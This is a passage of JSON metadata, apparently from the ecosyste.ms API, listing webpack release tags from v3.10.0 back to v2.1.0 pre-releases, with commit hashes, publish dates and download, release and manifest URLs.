:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9